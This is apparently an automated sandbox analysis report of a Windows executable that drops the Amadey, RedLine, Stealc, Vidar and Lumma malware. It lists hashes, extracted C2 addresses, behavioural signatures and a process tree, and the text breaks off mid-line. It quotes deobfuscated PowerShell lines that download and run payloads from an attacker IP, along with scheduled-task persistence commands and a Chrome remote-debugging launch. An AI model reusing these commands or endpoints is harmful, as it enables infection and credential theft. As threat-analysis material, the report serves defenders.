Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

21/02/2025, 13:19 UTC

250221-qkqm1sskh1 10

21/02/2025, 12:51 UTC

250221-p3vt1ssmek 10

20/02/2025, 14:07 UTC

250220-rey8mswqdj 10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/02/2025, 14:07 UTC

General

  • Target

    0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe

  • Size

    2.1MB

  • MD5

    f22b0344fefdf201d07314323a83b022

  • SHA1

    6dde721e943cb298e50446083c1d7260071aaaae

  • SHA256

    0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483

  • SHA512

    61f92704af7395159edb879fe394a64e30b0b0818d642be1eeecafeee54e22570add0e4eac88c83e00cd9a4642e09a8529c77a69b4b7613bc3bcb9f78f50feac

  • SSDEEP

    49152:vDB/YpemdpJhhEwrtke2DSl/YKH7vOITWMPnzZPoc9j:9/kXhEikRDS/bvOIbPnzZxj

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE"
2
(new-object system.net.webclient).downloadfile("http://185.215.113.16/defend/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "\\483d2fa8a0d53818306efeb32d3.exe"
2
(new-object system.net.webclient).downloadfile("http://185.215.113.16/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "0D7A7JN79A8OBJY0RPYF8PC47TCOJGG7.EXE"
2
(new-object system.net.webclient).downloadfile("http://185.215.113.16/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Extracted

Family

stealc

Botnet

default

C2

http://ecozessentials.com

Attributes
  • url_path

    /e6cb1c8fc7cd1659.php

Extracted

Family

vidar

C2

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

lumma

C2

https://penetratebatt.pw/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 5 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 27 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Uses browser remote debugging 2 TTPs 7 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 38 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 49 IoCs
  • Identifies Wine through registry keys 2 TTPs 19 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 17 IoCs
  • Drops file in Windows directory 17 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 38 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
    "C:\Users\Admin\AppData\Local\Temp\0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2108
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe
        "C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:680
        • C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
          "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: AddClipboardFormatListener
          PID:2392
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks.exe" /create /tn apisysDirectx_11 /tr "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe" /st 14:08 /du 23:59 /sc daily /ri 1 /f
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2284
      • C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe
        "C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1032
        • C:\Windows\SysWOW64\msiexec.exe
          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\91b7d375130f294a\ScreenConnect.ClientSetup.msi"
          4⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:1732
      • C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe
        "C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2280
      • C:\Users\Admin\AppData\Local\Temp\1089179101\7be12f2342.exe
        "C:\Users\Admin\AppData\Local\Temp\1089179101\7be12f2342.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1796
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn Gm2XTmagzMd /tr "mshta C:\Users\Admin\AppData\Local\Temp\hkn4fWTqr.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2740
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn Gm2XTmagzMd /tr "mshta C:\Users\Admin\AppData\Local\Temp\hkn4fWTqr.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2672
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\hkn4fWTqr.hta
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:2724
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2492
            • C:\Users\Admin\AppData\Local\Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
              "C:\Users\Admin\AppData\Local\Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE"
              6⤵
              • Modifies Windows Defender DisableAntiSpyware settings
              • Modifies Windows Defender Real-time Protection settings
              • Modifies Windows Defender TamperProtection settings
              • Modifies Windows Defender notification settings
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Windows security modification
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1620
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2032
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" any_word
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1032
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 2
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:600
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:728
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2044
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:892
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2484
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2088
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2912
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn "XNuwGmakeSC" /tr "mshta \"C:\Temp\oIlpHh5KE.hta\"" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2856
          • C:\Windows\SysWOW64\mshta.exe
            mshta "C:\Temp\oIlpHh5KE.hta"
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            PID:1820
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2376
              • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:1744
      • C:\Users\Admin\AppData\Local\Temp\1089273001\52206648a6.exe
        "C:\Users\Admin\AppData\Local\Temp\1089273001\52206648a6.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2504
      • C:\Users\Admin\AppData\Local\Temp\1089274001\f29907a492.exe
        "C:\Users\Admin\AppData\Local\Temp\1089274001\f29907a492.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:272
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 272 -s 800
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:1488
      • C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe
        "C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        PID:2492
        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
          4⤵
          • Downloads MZ/PE file
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          PID:876
          • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
            "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:2176
            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
              "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
              6⤵
              • Executes dropped EXE
              PID:2468
            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
              "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
              6⤵
              • Executes dropped EXE
              PID:2312
            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
              "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:988
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2176 -s 572
              6⤵
              • Loads dropped DLL
              • Program crash
              PID:272
          • C:\Users\Admin\AppData\Local\Temp\10009640101\372485f12e.exe
            "C:\Users\Admin\AppData\Local\Temp\10009640101\372485f12e.exe"
            5⤵
            • Enumerates VirtualBox registry keys
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            PID:2604
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
              6⤵
              • Uses browser remote debugging
              • Enumerates system info in registry
              • Suspicious use of FindShellTrayWindow
              PID:1740
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6449758,0x7fef6449768,0x7fef6449778
                7⤵
                  PID:932
                • C:\Windows\system32\ctfmon.exe
                  ctfmon.exe
                  7⤵
                    PID:852
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:2
                    7⤵
                      PID:1620
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1036 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:8
                      7⤵
                        PID:1708
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1640 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:8
                        7⤵
                          PID:2536
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2236 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:3144
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2320 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:3152
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1512 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:2
                          7⤵
                            PID:3580
                        • C:\Users\Admin\AppData\Local\Temp\service123.exe
                          "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:3400
                        • C:\Windows\SysWOW64\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                          6⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:3424
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 972
                          6⤵
                          • Program crash
                          PID:3776
                      • C:\Users\Admin\AppData\Local\Temp\10009650101\3d2e5da9a6.exe
                        "C:\Users\Admin\AppData\Local\Temp\10009650101\3d2e5da9a6.exe"
                        5⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:2032
                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                          6⤵
                          • Downloads MZ/PE file
                          PID:556
                  • C:\Users\Admin\AppData\Local\Temp\1089276001\db484a9c5c.exe
                    "C:\Users\Admin\AppData\Local\Temp\1089276001\db484a9c5c.exe"
                    3⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Modifies system certificate store
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2292
                  • C:\Users\Admin\AppData\Local\Temp\1089278001\DTQCxXZ.exe
                    "C:\Users\Admin\AppData\Local\Temp\1089278001\DTQCxXZ.exe"
                    3⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2984
                  • C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe
                    "C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    PID:1776
                    • C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe
                      "C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"
                      4⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Checks processor information in registry
                      • Modifies system certificate store
                      PID:3004
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                        5⤵
                        • Uses browser remote debugging
                        • Enumerates system info in registry
                        • Suspicious use of FindShellTrayWindow
                        PID:3756
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef62f9758,0x7fef62f9768,0x7fef62f9778
                          6⤵
                            PID:3768
                          • C:\Windows\system32\ctfmon.exe
                            ctfmon.exe
                            6⤵
                              PID:3884
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1184 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:2
                              6⤵
                                PID:3940
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1584 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:8
                                6⤵
                                  PID:3960
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1640 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:8
                                  6⤵
                                    PID:4032
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
